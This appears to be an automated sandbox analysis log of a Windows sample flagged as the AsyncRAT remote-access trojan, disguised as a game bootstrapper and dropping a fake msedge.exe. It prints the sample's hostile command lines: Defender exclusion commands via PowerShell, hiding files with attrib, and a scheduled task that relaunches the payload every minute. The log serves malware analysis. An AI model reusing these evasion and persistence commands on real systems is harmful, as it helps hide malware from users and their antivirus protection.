Source: YgJ5inWPQO.exe, 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: OriginalFilename_bz2.pyd. vs YgJ5inWPQO.exe
Source: YgJ5inWPQO.exe, 00000002.00000003.1477651096.000001D8A9479000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs YgJ5inWPQO.exe
Source: YgJ5inWPQO.exe, 00000002.00000002.1507486913.00007FFBAAEE2000.00000002.00000001.01000000.00000004.sdmp | Binary or memory string: OriginalFilenamepython313.dll. vs YgJ5inWPQO.exe
Source: YgJ5inWPQO.exe, 00000002.00000002.1495329200.000001D8A969D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsedge.exe4 vs YgJ5inWPQO.exe
Source: YgJ5inWPQO.exe, 00000002.00000003.1477753556.000001D8A9689000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsedge.exe4 vs YgJ5inWPQO.exe
Source: YgJ5inWPQO.exe, 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dllT vs YgJ5inWPQO.exe
Source: YgJ5inWPQO.exe, 00000002.00000003.1486802746.000001D8A968D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsedge.exe4 vs YgJ5inWPQO.exe
Source: YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs YgJ5inWPQO.exe
Source: YgJ5inWPQO.exe, 00000002.00000003.1486429771.000001D8A9688000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsedge.exe4 vs YgJ5inWPQO.exe
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 12.0.msedge.exe.3d0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000003.1479245702.000001D8A966B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000003.1485033909.000001D8A9686000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000C.00000000.1480505898.00000000003D2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000002.1495329200.000001D8A969D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000003.1477753556.000001D8A9689000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000003.1486802746.000001D8A968D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000003.1486429771.000001D8A9688000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\System User.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\msedge.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: msedge.exe.2.dr, 3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: msedge.exe.2.dr, 3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: msedge.exe.2.dr, 0z3ZIhpJfhq2njFq0TTjg8sopVsEWVPb24mSwU4g0QL4dxjF7JdE4QOgJ40VPuiaU.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, 3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, 3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, 0z3ZIhpJfhq2njFq0TTjg8sopVsEWVPb24mSwU4g0QL4dxjF7JdE4QOgJ40VPuiaU.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, 3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, 3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, 0z3ZIhpJfhq2njFq0TTjg8sopVsEWVPb24mSwU4g0QL4dxjF7JdE4QOgJ40VPuiaU.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, 3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, 3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: msedge.exe.2.dr, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: msedge.exe.2.dr, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: YgJ5inWPQO.exe, 00000002.00000002.1493989568.000001D8A78AC000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1492997781.000001D8A78AA000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487831431.000001D8A78A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBp@Y@.
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@49/42@6/6
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeFile created: C:\Users\user\AppData\Roaming\System User.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\System User.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4040:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeMutant created: \Sessions\1\BaseNamedObjects\xAXRhxSiuCvWXlAf
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4940:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2888:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3848:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6476
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4536:120:WilError_03
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI4322Jump to behavior
                      Source: YgJ5inWPQO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: YgJ5inWPQO.exeReversingLabs: Detection: 26%
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeFile read: C:\Users\user\Desktop\YgJ5inWPQO.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\YgJ5inWPQO.exe "C:\Users\user\Desktop\YgJ5inWPQO.exe"
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeProcess created: C:\Users\user\Desktop\YgJ5inWPQO.exe "C:\Users\user\Desktop\YgJ5inWPQO.exe"
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h C:\Users\user\AppData\Local\Temp\msedge.exe"
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h C:\Users\user\AppData\Local\Temp\dddd.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "START C:\Users\user\AppData\Local\Temp\msedge.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "START C:\Users\user\AppData\Local\Temp\dddd.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h C:\Users\user\AppData\Local\Temp\dddd.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msedge.exe C:\Users\user\AppData\Local\Temp\msedge.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h C:\Users\user\AppData\Local\Temp\msedge.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\dddd.exe C:\Users\user\AppData\Local\Temp\dddd.exe
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6476 -s 2224
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\System User.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe"
                      Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\System User.exe "C:\Users\user\AppData\Roaming\System User.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\System User.exe "C:\Users\user\AppData\Roaming\System User.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\System User.exe "C:\Users\user\AppData\Roaming\System User.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\System User.exe "C:\Users\user\AppData\Roaming\System User.exe"
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Section loaded: version.dll
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Section loaded: vcruntime140.dll
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Section loaded: python3.dll
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
                      Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
                      Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
                      Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: rasman.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: edputil.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: slc.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: sppc.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: sxs.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: mpr.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: scrrun.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: linkinfo.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: ntshrui.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: cscapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: avicap32.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: msvfw32.dll
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Section loaded: winmm.dll
                      Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
                      Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: rasman.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Section loaded: secur32.dll
